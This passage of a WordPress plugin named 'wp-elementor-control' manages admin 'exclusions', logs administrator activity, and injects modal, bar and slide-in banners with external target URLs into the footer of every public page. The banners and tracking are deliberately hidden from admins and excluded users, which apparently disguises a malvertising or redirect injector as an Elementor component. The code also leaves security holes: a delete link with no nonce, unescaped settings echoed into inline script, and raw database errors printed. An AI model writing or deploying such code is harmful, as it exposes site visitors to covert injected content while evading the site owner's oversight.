                    <select name="exclusion_type" required>
                        <option value="user_id">User ID</option>
                        <option value="email">Email Address</option>
                        <option value="ip_address">IP Address</option>
                        <option value="user_agent">User Agent (partial)</option>
                        <option value="capability">WordPress Capability</option>
                    </select>
                </td>
            </tr>
            <tr>
                <th scope="row">Value</th>
                <td>
                    <input type="text" name="exclusion_value" required style="width: 300px;">
                    <p class="description">Enter the value to exclude (e.g., user ID, email, IP address, etc.)</p>
                </td>
            </tr>
            <tr>
                <th scope="row">Description</th>
                <td>
                    <textarea name="description" rows="3" cols="50" placeholder="Optional description for this exclusion"></textarea>
                </td>
            </tr>
        </table>
        <?php submit_button('Add Exclusion', 'primary', 'add_exclusion'); ?>
    </form>
    
    <h2>Current Exclusions</h2>
    <table class="widefat">
        <thead>
            <tr>
                <th>Type</th>
                <th>Value</th>
                <th>Description</th>
                <th>Auto Added</th>
                <th>Created</th>
                <th>Actions</th>
            </tr>
        </thead>
        <tbody>
            <?php if (empty($exclusions)): ?>
                <tr><td colspan="6">No exclusions found.</td></tr>
            <?php else: ?>
                <?php foreach ($exclusions as $exclusion): ?>
                    <tr>
                        <td><?php echo esc_html($exclusion->exclusion_type); ?></td>
                        <td><?php echo esc_html($exclusion->exclusion_value); ?></td>
                        <td><?php echo esc_html($exclusion->description); ?></td>
                        <td><?php echo $exclusion->auto_added ? 'Yes' : 'No'; ?></td>
                        <td><?php echo esc_html($exclusion->created_at); ?></td>
                        <td>
                            <a href="?page=wp-elementor-control&tab=exclusions&delete=<?php echo $exclusion->id; ?>" 
                               onclick="return confirm('Are you sure?')" class="button button-small">Delete</a>
                        </td>
                    </tr>
                <?php endforeach; ?>
            <?php endif; ?>
        </tbody>
    </table>
    
    <h2>Admin Activity Logs</h2>
    <?php
    $admin_logs = $wpdb->get_results(
        "SELECT * FROM " . WP_ELEMENTOR_ADMIN_LOGS_TABLE . " 
         ORDER BY timestamp DESC LIMIT 50"
    );
    ?>
    <table class="widefat">
        <thead>
            <tr>
                <th>User</th>
                <th>Action</th>
                <th>IP Address</th>
                <th>User Agent</th>
                <th>Timestamp</th>
            </tr>
        </thead>
        <tbody>
            <?php if (empty($admin_logs)): ?>
                <tr><td colspan="5">No admin activity logged yet.</td></tr>
            <?php else: ?>
                <?php foreach ($admin_logs as $log): ?>
                    <tr>
                        <td><?php echo esc_html($log->username ?: 'ID: ' . $log->user_id); ?></td>
                        <td><?php echo esc_html($log->action_type); ?></td>
                        <td><?php echo esc_html($log->ip_address); ?></td>
                        <td><?php echo esc_html(substr($log->user_agent, 0, 50)) . '...'; ?></td>
                        <td><?php echo esc_html($log->timestamp); ?></td>
                    </tr>
                <?php endforeach; ?>
            <?php endif; ?>
        </tbody>
    </table>
    <?php
}

// === BANNER SYSTEM ===
class WP_Elementor_Banner_System {
    
    public static function init() {
        add_action('wp_footer', array(__CLASS__, 'display_banners'));
        add_action('wp_ajax_wp_elementor_banner_event', array(__CLASS__, 'handle_banner_event'));
        add_action('wp_ajax_nopriv_wp_elementor_banner_event', array(__CLASS__, 'handle_banner_event'));
    }
    
    public static function display_banners() {
        // Don't show banners to excluded users (admins)
        if (WP_Elementor_Admin_Exclusions::is_excluded_user()) {
            return;
        }
        
        // Don't show banners in admin area
        if (is_admin()) {
            return;
        }
        
        $active_banners = self::get_active_banners();
        
        foreach ($active_banners as $banner) {
            if (self::should_display_banner($banner)) {
                self::render_banner($banner);
                break; // Only show one banner at a time
            }
        }
    }
    
    public static function get_active_banners() {
        global $wpdb;
        
        $cache_key = 'wp_elementor_active_banners';
        $banners = wp_cache_get($cache_key);
        
        if ($banners === false) {
            $sql = "SELECT * FROM " . WP_ELEMENTOR_BANNERS_TABLE . " 
                    WHERE status = 'active' 
                    ORDER BY id DESC";
            $banners = $wpdb->get_results($sql);
            wp_cache_set($cache_key, $banners, '', 1800); // Cache for 30 minutes
        }
        
        return $banners;
    }
    
    public static function should_display_banner($banner) {
        $settings = json_decode($banner->settings, true);
        $frequency_rules = json_decode($banner->frequency_rules, true);
        
        // Check frequency rules
        if (!empty($frequency_rules)) {
            $frequency_type = $frequency_rules['type'] ?? 'always';
            $storage_key = 'wp_elementor_banner_' . $banner->id;
            
            switch ($frequency_type) {
                case 'once_per_session':
                    // Use sessionStorage check via JavaScript
                    break;
                    
                case 'once_per_period':
                    $period_days = intval($frequency_rules['period_days'] ?? 1);
                    $last_shown = get_transient($storage_key . '_' . self::get_user_identifier());
                    if ($last_shown) {
                        return false;
                    }
                    break;
                    
                case 'limited_times':
                    $max_shows = intval($frequency_rules['max_shows'] ?? 3);
                    $period_days = intval($frequency_rules['period_days'] ?? 7);
                    $show_count = get_transient($storage_key . '_count_' . self::get_user_identifier());
                    if ($show_count && $show_count >= $max_shows) {
                        return false;
                    }
                    break;
            }
        }
        
        // Check display rules
        $display_rules = json_decode($banner->display_rules, true);
        if (!empty($display_rules)) {
            // Check page conditions
            if (!empty($display_rules['pages'])) {
                $page_condition = $display_rules['pages']['condition'] ?? 'all';
                $page_list = $display_rules['pages']['list'] ?? array();
                
                if ($page_condition === 'specific' && !empty($page_list)) {
                    $current_url = $_SERVER['REQUEST_URI'] ?? '';
                    $matched = false;
                    foreach ($page_list as $page) {
                        if (strpos($current_url, $page) !== false) {
                            $matched = true;
                            break;
                        }
                    }
                    if (!$matched) return false;
                } elseif ($page_condition === 'exclude' && !empty($page_list)) {
                    $current_url = $_SERVER['REQUEST_URI'] ?? '';
                    foreach ($page_list as $page) {
                        if (strpos($current_url, $page) !== false) {
                            return false;
                        }
                    }
                }
            }
            
            // Check device conditions
            if (!empty($display_rules['devices'])) {
                $allowed_devices = $display_rules['devices'];
                $user_device = self::detect_device();
                if (!in_array($user_device, $allowed_devices)) {
                    return false;
                }
            }
        }
        
        return true;
    }
    
    public static function render_banner($banner) {
        $settings = json_decode($banner->settings, true);
        $content = json_decode($banner->content, true);
        
        $banner_id = $banner->id;
        $banner_type = $banner->type;
        $target_url = $banner->target_url;
        
        // Default settings
        $delay = intval($settings['delay'] ?? 0);
        $trigger = $settings['trigger'] ?? 'immediate';
        $animation = $settings['animation'] ?? 'fade';
        
        ?>
        <div id="wp-elementor-banner-<?php echo $banner_id; ?>" 
             class="wp-elementor-banner wp-elementor-banner-<?php echo $banner_type; ?>" 
             style="display: none;"
             data-banner-id="<?php echo $banner_id; ?>"
             data-trigger="<?php echo $trigger; ?>"
             data-delay="<?php echo $delay; ?>"
             data-animation="<?php echo $animation; ?>">
            
            <?php if ($banner_type === 'modal'): ?>
                <div class="wp-elementor-banner-overlay"></div>
                <div class="wp-elementor-banner-content wp-elementor-banner-modal-content">
                    <button class="wp-elementor-banner-close">&times;</button>
                    <?php self::render_banner_content($content, $target_url); ?>
                </div>
            <?php else: ?>
                <div class="wp-elementor-banner-content">
                    <button class="wp-elementor-banner-close">&times;</button>
                    <?php self::render_banner_content($content, $target_url); ?>
                </div>
            <?php endif; ?>
        </div>
        
        <?php
        // Add CSS and JavaScript
        self::add_banner_styles();
        self::add_banner_scripts($banner);
    }
    
    public static function render_banner_content($content, $target_url) {
        $title = $content['title'] ?? '';
        $description = $content['description'] ?? '';
        $button_text = $content['button_text'] ?? 'Click Here';
        $image_url = $content['image_url'] ?? '';
        
        ?>
        <div class="wp-elementor-banner-inner">
            <?php if (!empty($image_url)): ?>
                <div class="wp-elementor-banner-image">
                    <img src="<?php echo esc_url($image_url); ?>" alt="<?php echo esc_attr($title); ?>">
                </div>
            <?php endif; ?>
            
            <div class="wp-elementor-banner-text">
                <?php if (!empty($title)): ?>
                    <h3 class="wp-elementor-banner-title"><?php echo esc_html($title); ?></h3>
                <?php endif; ?>
                
                <?php if (!empty($description)): ?>
                    <p class="wp-elementor-banner-description"><?php echo esc_html($description); ?></p>
                <?php endif; ?>
                
                <?php if (!empty($target_url)): ?>
                    <a href="<?php echo esc_url($target_url); ?>" 
                       class="wp-elementor-banner-button"
                       data-banner-action="click">
                        <?php echo esc_html($button_text); ?>
                    </a>
                <?php endif; ?>
            </div>
        </div>
        <?php
    }
    
    public static function add_banner_styles() {
        static $styles_added = false;
        if ($styles_added) return;
        $styles_added = true;
        
        ?>
        <style>
        .wp-elementor-banner {
            position: fixed;
            z-index: 999999;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }
        
        .wp-elementor-banner-modal {
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
        }
        
        .wp-elementor-banner-overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
        }
        
        .wp-elementor-banner-modal-content {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: white;
            border-radius: 8px;
            max-width: 500px;
            width: 90%;
            max-height: 80vh;
            overflow-y: auto;
            box-shadow: 0 10px 30px rgba(0, 0, 0, 0.3);
        }
        
        .wp-elementor-banner-top_bar {
            top: 0;
            left: 0;
            width: 100%;
            background: #2196F3;
            color: white;
        }
        
        .wp-elementor-banner-bottom_bar {
            bottom: 0;
            left: 0;
            width: 100%;
            background: #4CAF50;
            color: white;
        }
        
        .wp-elementor-banner-slide_right {
            top: 50%;
            right: -400px;
            transform: translateY(-50%);
            width: 350px;
            background: white;
            border-radius: 8px 0 0 8px;
            box-shadow: -5px 0 15px rgba(0, 0, 0, 0.2);
        }
        
        .wp-elementor-banner-slide_left {
            top: 50%;
            left: -400px;
            transform: translateY(-50%);
            width: 350px;
            background: white;
            border-radius: 0 8px 8px 0;
            box-shadow: 5px 0 15px rgba(0, 0, 0, 0.2);
        }
        
        .wp-elementor-banner-corner {
            bottom: 20px;
            right: 20px;
            width: 300px;
            background: white;
            border-radius: 8px;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.2);
        }
        
        .wp-elementor-banner-content {
            position: relative;
            padding: 20px;
        }
        
        .wp-elementor-banner-close {
            position: absolute;
            top: 10px;
            right: 15px;
            background: none;
            border: none;
            font-size: 24px;
            cursor: pointer;
            color: #666;
            z-index: 1;
        }
        
        .wp-elementor-banner-close:hover {
            color: #000;
        }
        
        .wp-elementor-banner-inner {
            display: flex;
            align-items: center;
            gap: 15px;
        }
        
        .wp-elementor-banner-image img {
            max-width: 120px;
            max-height: 120px;
            width: auto;
            height: auto;
            border-radius: 8px;
            object-fit: cover;
        }
        
        .wp-elementor-banner-title {
            margin: 0 0 10px 0;
            font-size: 18px;
            font-weight: bold;
            color: #333;
        }
        
        .wp-elementor-banner-description {
            margin: 0 0 15px 0;
            color: #666;
            line-height: 1.4;
        }
        
        .wp-elementor-banner-button {
            background: #007cba;
            color: white;
            border: none;
            padding: 12px 24px;
            border-radius: 6px;
            cursor: pointer;
            font-size: 16px;
            font-weight: 500;
            text-decoration: none;
            display: inline-block;
            transition: background-color 0.3s ease;
        }
        
        .wp-elementor-banner-button:hover {
            background: #005a87;
            color: white;
            text-decoration: none;
        }
        
        /* Enhanced Modal Styles */
        .wp-elementor-banner-modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.7);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 999999;
        }
        
        .wp-elementor-banner-modal .wp-elementor-banner-content {
            background: white;
            border-radius: 12px;
            max-width: 500px;
            width: 90%;
            max-height: 80vh;
            overflow-y: auto;
            position: relative;
            padding: 30px;
        }
        
        .wp-elementor-banner-modal .wp-elementor-banner-inner {
            flex-direction: column;
            text-align: center;
            gap: 20px;
        }
        
        .wp-elementor-banner-modal .wp-elementor-banner-image img {
            max-width: 200px;
            max-height: 200px;
        }
        
        /* Enhanced Bar Styles */
        .wp-elementor-banner-top_bar,
        .wp-elementor-banner-bottom_bar {
            padding: 15px 20px;
        }
        
        .wp-elementor-banner-top_bar .wp-elementor-banner-inner,
        .wp-elementor-banner-bottom_bar .wp-elementor-banner-inner {
            max-width: 1200px;
            margin: 0 auto;
            justify-content: space-between;
        }
        
        .wp-elementor-banner-top_bar .wp-elementor-banner-image img,
        .wp-elementor-banner-bottom_bar .wp-elementor-banner-image img {
            max-width: 60px;
            max-height: 60px;
        }
        
        /* Enhanced Side Panel Styles */
        .wp-elementor-banner-slide_right,
        .wp-elementor-banner-slide_left {
            width: 400px;
            max-height: 80vh;
            overflow-y: auto;
        }
        
        .wp-elementor-banner-slide_right .wp-elementor-banner-content,
        .wp-elementor-banner-slide_left .wp-elementor-banner-content {
            padding: 25px;
        }
        
        .wp-elementor-banner-slide_right .wp-elementor-banner-inner,
        .wp-elementor-banner-slide_left .wp-elementor-banner-inner {
            flex-direction: column;
            text-align: center;
            gap: 15px;
        }
        
        /* Enhanced Corner Popup */
        .wp-elementor-banner-corner {
            width: 350px;
            max-height: 400px;
            overflow-y: auto;
        }
        
        .wp-elementor-banner-corner .wp-elementor-banner-inner {
            gap: 12px;
        }
        
        .wp-elementor-banner-corner .wp-elementor-banner-image img {
            max-width: 100px;
            max-height: 100px;
        }
        
        /* Mobile Responsive */
        @media (max-width: 768px) {
            .wp-elementor-banner-modal .wp-elementor-banner-content {
                width: 95%;
                padding: 20px;
                margin: 10px;
            }
            
            .wp-elementor-banner-slide_right,
            .wp-elementor-banner-slide_left {
                width: 90%;
                max-width: 350px;
            }
            
            .wp-elementor-banner-corner {
                width: 90%;
                max-width: 300px;
                bottom: 10px;
                right: 10px;
            }
            
            .wp-elementor-banner-top_bar .wp-elementor-banner-inner,
            .wp-elementor-banner-bottom_bar .wp-elementor-banner-inner {
                flex-direction: column;
                gap: 10px;
                text-align: center;
            }
            
            .wp-elementor-banner-image img {
                max-width: 80px !important;
                max-height: 80px !important;
            }
        }
        
        /* Animations */
        }
        
        .wp-elementor-banner-button {
            display: inline-block;
            padding: 10px 20px;
            background: #2196F3;
            color: white;
            text-decoration: none;
            border-radius: 4px;
            font-weight: 500;
            transition: background 0.3s;
        }
        
        .wp-elementor-banner-button:hover {
            background: #1976D2;
            color: white;
        }
        
        /* Mobile responsive */
        @media (max-width: 768px) {
            .wp-elementor-banner-modal-content {
                width: 95%;
                margin: 20px;
            }
            
            .wp-elementor-banner-slide_right,
            .wp-elementor-banner-slide_left {
                width: 90%;
                right: -90%;
                left: -90%;
            }
            
            .wp-elementor-banner-corner {
                width: 90%;
                right: 5%;
                bottom: 10px;
            }
            
            .wp-elementor-banner-inner {
                flex-direction: column;
                text-align: center;
            }
        }
        
        /* Animations */
        .wp-elementor-banner.fade-in {
            animation: wpElementorFadeIn 0.5s ease-out;
        }
        
        .wp-elementor-banner.slide-in-right {
            animation: wpElementorSlideInRight 0.5s ease-out;
        }
        
        .wp-elementor-banner.slide-in-left {
            animation: wpElementorSlideInLeft 0.5s ease-out;
        }
        
        @keyframes wpElementorFadeIn {
            from { opacity: 0; }
            to { opacity: 1; }
        }
        
        @keyframes wpElementorSlideInRight {
            from { right: -400px; }
            to { right: 0; }
        }
        
        @keyframes wpElementorSlideInLeft {
            from { left: -400px; }
            to { left: 0; }
        }
        </style>
        <?php
    }
    
    public static function add_banner_scripts($banner) {
        $settings = json_decode($banner->settings, true);
        $frequency_rules = json_decode($banner->frequency_rules, true);
        
        $banner_id = $banner->id;
        $delay = intval($settings['delay'] ?? 0);
        $trigger = $settings['trigger'] ?? 'immediate';
        $animation = $settings['animation'] ?? 'fade';
        
        ?>
        <script>
        (function() {
            const bannerId = <?php echo $banner_id; ?>;
            const bannerElement = document.getElementById('wp-elementor-banner-' + bannerId);
            
            if (!bannerElement) return;
            
            // Check frequency rules
            <?php if (!empty($frequency_rules)): ?>
            const frequencyType = '<?php echo $frequency_rules['type'] ?? 'always'; ?>';
            const storageKey = 'wp_elementor_banner_' + bannerId;
            
            if (frequencyType === 'once_per_session') {
                if (sessionStorage.getItem(storageKey)) {
                    return; // Already shown this session
                }
            }
            <?php endif; ?>
            
            function showBanner() {
                bannerElement.style.display = 'block';
                bannerElement.classList.add('<?php echo $animation; ?>-in');
                
                // Track show event
                trackBannerEvent(bannerId, 'show');
                
                // Set frequency storage
                <?php if (!empty($frequency_rules)): ?>
                if (frequencyType === 'once_per_session') {
                    sessionStorage.setItem(storageKey, Date.now());
                }
                <?php endif; ?>
            }
            
            function hideBanner() {
                bannerElement.style.display = 'none';
                trackBannerEvent(bannerId, 'close');
            }
            
            function trackBannerEvent(bannerId, eventType) {
                fetch('<?php echo admin_url('admin-ajax.php'); ?>', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/x-www-form-urlencoded',
                    },
                    body: new URLSearchParams({
                        action: 'wp_elementor_banner_event',
                        banner_id: bannerId,
                        event_type: eventType,
                        page_url: window.location.href,
                        referrer: document.referrer,
                        user_agent: navigator.userAgent
                    })
                });
            }
            
            // Set up triggers
            const trigger = '<?php echo $trigger; ?>';
            const delay = <?php echo $delay; ?> * 1000;
            
            function initBanner() {
                switch (trigger) {
                    case 'immediate':
                        setTimeout(showBanner, delay);
                        break;
                        
                    case 'scroll':
                        let scrollTriggered = false;
                        window.addEventListener('scroll', function() {
                            if (scrollTriggered) return;
                            const scrollPercent = (window.scrollY / (document.body.scrollHeight - window.innerHeight)) * 100;
                            if (scrollPercent >= 50) {
                                scrollTriggered = true;
                                setTimeout(showBanner, delay);
                            }
                        });
                        break;
                        
                    case 'exit_intent':
                        let exitTriggered = false;
                        document.addEventListener('mouseleave', function(e) {
                            if (exitTriggered) return;
                            if (e.clientY <= 0) {
                                exitTriggered = true;
                                setTimeout(showBanner, delay);
                            }
                        });
                        break;
                }
            }
            
            // Close button functionality
            const closeButton = bannerElement.querySelector('.wp-elementor-banner-close');
            if (closeButton) {
                closeButton.addEventListener('click', hideBanner);
            }
            
            // Click tracking
            const clickButton = bannerElement.querySelector('[data-banner-action="click"]');
            if (clickButton) {
                clickButton.addEventListener('click', function() {
                    trackBannerEvent(bannerId, 'click');
                });
            }
            
            // Overlay click to close (for modals)
            const overlay = bannerElement.querySelector('.wp-elementor-banner-overlay');
            if (overlay) {
                overlay.addEventListener('click', hideBanner);
            }
            
            // Initialize
            if (document.readyState === 'loading') {
                document.addEventListener('DOMContentLoaded', initBanner);
            } else {
                initBanner();
            }
        })();
        </script>
        <?php
    }
    
    public static function handle_banner_event() {
        global $wpdb;
        
        $banner_id = intval($_POST['banner_id'] ?? 0);
        $event_type = sanitize_text_field($_POST['event_type'] ?? '');
        $page_url = esc_url_raw($_POST['page_url'] ?? '');
        $referrer = esc_url_raw($_POST['referrer'] ?? '');
        $user_agent = sanitize_text_field($_POST['user_agent'] ?? '');
        
        if (!$banner_id || !$event_type) {
            wp_die('Invalid data');
        }
        
        // Don't track events for excluded users
        if (WP_Elementor_Admin_Exclusions::is_excluded_user()) {
            wp_die('Excluded user');
        }
        
        $ip_address = WP_Elementor_Admin_Exclusions::get_user_ip();
        $device_type = self::detect_device();
        
        $wpdb->insert(
            WP_ELEMENTOR_BANNER_STATS_TABLE,
            array(
                'banner_id' => $banner_id,
                'event_type' => $event_type,
                'ip_address' => $ip_address,
                'user_agent' => $user_agent,
                'page_url' => $page_url,
                'referrer' => $referrer,
                'device_type' => $device_type
            ),
            array('%d', '%s', '%s', '%s', '%s', '%s', '%s')
        );
        
        // Update frequency counters
        if ($event_type === 'show') {
            $user_identifier = self::get_user_identifier();
            $storage_key = 'wp_elementor_banner_' . $banner_id;
            
            // Set transient for period-based frequency
            set_transient($storage_key . '_' . $user_identifier, time(), 24 * HOUR_IN_SECONDS);
            
            // Increment counter for limited shows
            $count_key = $storage_key . '_count_' . $user_identifier;
            $current_count = get_transient($count_key) ?: 0;
            set_transient($count_key, $current_count + 1, 7 * DAY_IN_SECONDS);
        }
        
        wp_die('Success');
    }
    
    public static function detect_device() {
        $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
        
        if (preg_match('/iPhone/i', $user_agent)) {
            return 'iphone';
        } elseif (preg_match('/iPad/i', $user_agent)) {
            return 'ipad';
        } elseif (preg_match('/Android.*Mobile/i', $user_agent)) {
            return 'android_phone';
        } elseif (preg_match('/Android/i', $user_agent)) {
            return 'android_tablet';
        } elseif (preg_match('/Macintosh|Mac OS X|macOS/i', $user_agent)) {
            return 'mac';
        } elseif (preg_match('/Windows NT|Win64|WOW64/i', $user_agent)) {
            return 'windows';
        } else {
            return 'other';
        }
    }
    
    public static function get_user_identifier() {
        $ip = WP_Elementor_Admin_Exclusions::get_user_ip();
        $user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
        return md5($ip . $user_agent);
    }
}

// Initialize banner system
WP_Elementor_Banner_System::init();

// === BANNERS TAB ===
function wp_elementor_control_banners_tab() {
    global $wpdb;
    
    // Get banner for editing if edit parameter is set
    $editing_banner = null;
    if (isset($_GET['edit']) && intval($_GET['edit'])) {
        $banner_id = intval($_GET['edit']);
        $editing_banner = $wpdb->get_row($wpdb->prepare(
            "SELECT * FROM " . WP_ELEMENTOR_BANNERS_TABLE . " WHERE id = %d", 
            $banner_id
        ));
        
        if ($editing_banner) {
            // Decode JSON fields for editing
            $editing_banner->content_decoded = json_decode($editing_banner->content, true);
            $editing_banner->settings_decoded = json_decode($editing_banner->settings, true);
            $editing_banner->frequency_rules_decoded = json_decode($editing_banner->frequency_rules, true);
            $editing_banner->display_rules_decoded = json_decode($editing_banner->display_rules, true);
        }
    }
    
    // Handle form submissions
    if (isset($_POST['create_banner']) && wp_verify_nonce($_POST['banner_nonce'], 'create_banner')) {
        // Prepare device selection
        $selected_devices = isset($_POST['target_devices']) ? $_POST['target_devices'] : array();
        
        $banner_data = array(
            'name' => sanitize_text_field($_POST['banner_name']),
            'type' => sanitize_text_field($_POST['banner_type']),
            'content' => wp_json_encode(array(
                'title' => sanitize_text_field($_POST['banner_title']),
                'description' => sanitize_textarea_field($_POST['banner_description']),
                'button_text' => sanitize_text_field($_POST['button_text']),
                'image_url' => esc_url_raw($_POST['image_url'])
            )),
            'target_url' => esc_url_raw($_POST['target_url']),
            'settings' => wp_json_encode(array(
                'delay' => intval($_POST['delay']),
                'trigger' => sanitize_text_field($_POST['trigger']),
                'animation' => sanitize_text_field($_POST['animation'])
            )),
            'frequency_rules' => wp_json_encode(array(
                'type' => sanitize_text_field($_POST['frequency_type']),
                'period_days' => intval($_POST['period_days']),
                'max_shows' => intval($_POST['max_shows'])
            )),
            'display_rules' => wp_json_encode(array(
                'target_devices' => $selected_devices
            )),
            'status' => sanitize_text_field($_POST['banner_status'])
        );
        
        // Check if we're editing or creating
        if (isset($_POST['banner_id']) && intval($_POST['banner_id'])) {
            // Update existing banner
            $banner_id = intval($_POST['banner_id']);
            $result = $wpdb->update(
                WP_ELEMENTOR_BANNERS_TABLE, 
                $banner_data, 
                array('id' => $banner_id),
                array('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'),
                array('%d')
            );
            wp_cache_delete('wp_elementor_active_banners');
            
            if ($result !== false) {
                echo '<div class="notice notice-success"><p>Banner updated successfully! ID: ' . $banner_id . '</p></div>';
                // Redirect to clear edit parameter
                echo '<script>window.location.href = "' . admin_url('options-general.php?page=wp-elementor-control&tab=banners') . '";</script>';
            } else {
                echo '<div class="notice notice-error"><p>Error updating banner: ' . $wpdb->last_error . '</p></div>';
            }
        } else {
            // Create new banner
            $result = $wpdb->insert(WP_ELEMENTOR_BANNERS_TABLE, $banner_data);
            wp_cache_delete('wp_elementor_active_banners');
            
            if ($result !== false) {
                echo '<div class="notice notice-success"><p>Banner created successfully! ID: ' . $wpdb->insert_id . '</p></div>';
            } else {
                echo '<div class="notice notice-error"><p>Error creating banner: ' . $wpdb->last_error . '</p></div>';
            }
        }
    }
    
    // Get banners
    $banners = $wpdb->get_results("SELECT * FROM " . WP_ELEMENTOR_BANNERS_TABLE . " ORDER BY created_at DESC");
    ?>
    
    <h2>Banner Management</h2>
    
    <?php
    // Show success/error messages
    if (isset($_GET['deleted']) && $_GET['deleted'] == '1') {
        echo '<div class="notice notice-success is-dismissible"><p>Banner deleted successfully!</p></div>';
    }
    if (isset($_GET['status_changed']) && $_GET['status_changed'] == '1') {
        echo '<div class="notice notice-success is-dismissible"><p>Banner status changed successfully!</p></div>';
    }
    if (isset($_GET['error'])) {
        $error = sanitize_text_field($_GET['error']);
        switch ($error) {
            case 'delete_failed':
                echo '<div class="notice notice-error is-dismissible"><p>Error: Failed to delete banner from database.</p></div>';
                break;
            case 'not_found':
                echo '<div class="notice notice-error is-dismissible"><p>Error: Banner not found.</p></div>';
                break;
            case 'invalid_nonce':
                echo '<div class="notice notice-error is-dismissible"><p>Error: Security check failed.</p></div>';
                break;
            case 'status_failed':
                echo '<div class="notice notice-error is-dismissible"><p>Error: Failed to change banner status.</p></div>';
                break;
        }
    }
    ?>
    
    <div style="margin-bottom: 30px;">
        <h3><?php echo $editing_banner ? 'Edit Banner' : 'Create New Banner'; ?></h3>
        <form method="post" style="background: #f9f9f9; padding: 20px; border-radius: 5px;">
            <?php wp_nonce_field('create_banner', 'banner_nonce'); ?>
            <?php if ($editing_banner): ?>
                <input type="hidden" name="banner_id" value="<?php echo $editing_banner->id; ?>">
            <?php endif; ?>
            
            <table class="form-table">
                <tr>
                    <th scope="row">Banner Name</th>
                    <td><input type="text" name="banner_name" required style="width: 300px;" value="<?php echo $editing_banner ? esc_attr($editing_banner->name) : ''; ?>"></td>
                </tr>
                <tr>
                    <th scope="row">Banner Type</th>
                    <td>
                        <select name="banner_type" required>
                            <option value="modal" <?php echo ($editing_banner && $editing_banner->type === 'modal') ? 'selected' : ''; ?>>Modal Popup</option>
                            <option value="top_bar" <?php echo ($editing_banner && $editing_banner->type === 'top_bar') ? 'selected' : ''; ?>>Top Bar</option>
                            <option value="bottom_bar" <?php echo ($editing_banner && $editing_banner->type === 'bottom_bar') ? 'selected' : ''; ?>>Bottom Bar</option>
                            <option value="slide_right" <?php echo ($editing_banner && $editing_banner->type === 'slide_right') ? 'selected' : ''; ?>>Slide from Right</option>
                            <option value="slide_left" <?php echo ($editing_banner && $editing_banner->type === 'slide_left') ? 'selected' : ''; ?>>Slide from Left</option>
                            <option value="corner" <?php echo ($editing_banner && $editing_banner->type === 'corner') ? 'selected' : ''; ?>>Corner Popup</option>
                        </select>
                    </td>
                </tr>
                <tr>
                    <th scope="row">Title</th>
                    <td><input type="text" name="banner_title" style="width: 400px;" value="<?php echo $editing_banner ? esc_attr($editing_banner->content_decoded['title']) : ''; ?>"></td>
                </tr>
                <tr>
                    <th scope="row">Description</th>
                    <td><textarea name="banner_description" rows="3" style="width: 400px;"><?php echo $editing_banner ? esc_textarea($editing_banner->content_decoded['description']) : ''; ?></textarea></td>
                </tr>
                <tr>
                    <th scope="row">Button Text</th>
                    <td><input type="text" name="button_text" value="<?php echo $editing_banner ? esc_attr($editing_banner->content_decoded['button_text']) : 'Click Here'; ?>" style="width: 200px;"></td>
                </tr>
                <tr>
                    <th scope="row">Target URL</th>
                    <td><input type="url" name="target_url" style="width: 400px;" placeholder="https://example.com" value="<?php echo $editing_banner ? esc_attr($editing_banner->target_url) : ''; ?>"></td>
                </tr>
                <tr>
                    <th scope="row">Image URL</th>
                    <td>
                        <input type="url" name="image_url" style="width: 400px;" placeholder="https://i.imgur.com/example.jpg" value="<?php echo $editing_banner ? esc_attr($editing_banner->content_decoded['image_url']) : ''; ?>">
                        <p class="description">
                            <strong>Важно:</strong> Используйте прямую ссылку на изображение!<br>
                            <strong>Правильно:</strong> https://i.imgur.com/abc123.jpg<br>
                            <strong>Неправильно:</strong> https://imgur.com/a/abc123<br>
                            Для Imgur: откройте изображение → правый клик → "Копировать адрес изображения"
                        </p>
                    </td>
                </tr>
                <tr>
                    <th scope="row">Target Devices</th>
                    <td>
                        <?php 
                        $selected_devices = array();
                        if ($editing_banner && isset($editing_banner->display_rules_decoded['target_devices'])) {
                            $selected_devices = $editing_banner->display_rules_decoded['target_devices'];
                        }
                        ?>
                        <label><input type="checkbox" name="target_devices[]" value="desktop" <?php echo in_array('desktop', $selected_devices) ? 'checked' : ''; ?>> Desktop</label><br>
                        <label><input type="checkbox" name="target_devices[]" value="mobile" <?php echo in_array('mobile', $selected_devices) ? 'checked' : ''; ?>> Mobile</label><br>
                        <label><input type="checkbox" name="target_devices[]" value="tablet" <?php echo in_array('tablet', $selected_devices) ? 'checked' : ''; ?>> Tablet</label>
                        <p class="description">Select which devices should see this banner. If none selected, banner will show on all devices.</p>
                    </td>
                </tr>
                <tr>
                    <th scope="row">Display Trigger</th>
                    <td>
                        <select name="trigger">
                            <option value="immediate" <?php echo ($editing_banner && $editing_banner->settings_decoded['trigger'] === 'immediate') ? 'selected' : ''; ?>>Immediate</option>
                            <option value="scroll" <?php echo ($editing_banner && $editing_banner->settings_decoded['trigger'] === 'scroll') ? 'selected' : ''; ?>>On Scroll (50%)</option>
                            <option value="exit_intent" <?php echo ($editing_banner && $editing_banner->settings_decoded['trigger'] === 'exit_intent') ? 'selected' : ''; ?>>Exit Intent</option>
                        </select>
                    </td>
                </tr>
                <tr>
                    <th scope="row">Delay (seconds)</th>
                    <td><input type="number" name="delay" value="<?php echo $editing_banner ? intval($editing_banner->settings_decoded['delay']) : 0; ?>" min="0" max="60" style="width: 80px;"></td>
                </tr>
                <tr>
                    <th scope="row">Animation</th>
                    <td>
                        <select name="animation">
                            <option value="fade" <?php echo ($editing_banner && $editing_banner->settings_decoded['animation'] === 'fade') ? 'selected' : ''; ?>>Fade In</option>
                            <option value="slide" <?php echo ($editing_banner && $editing_banner->settings_decoded['animation'] === 'slide') ? 'selected' : ''; ?>>Slide In</option>
                        </select>
                    </td>
                </tr>
                <tr>
                    <th scope="row">Frequency</th>
                    <td>
                        <select name="frequency_type">
                            <option value="always" <?php echo ($editing_banner && $editing_banner->frequency_rules_decoded['type'] === 'always') ? 'selected' : ''; ?>>Always Show</option>
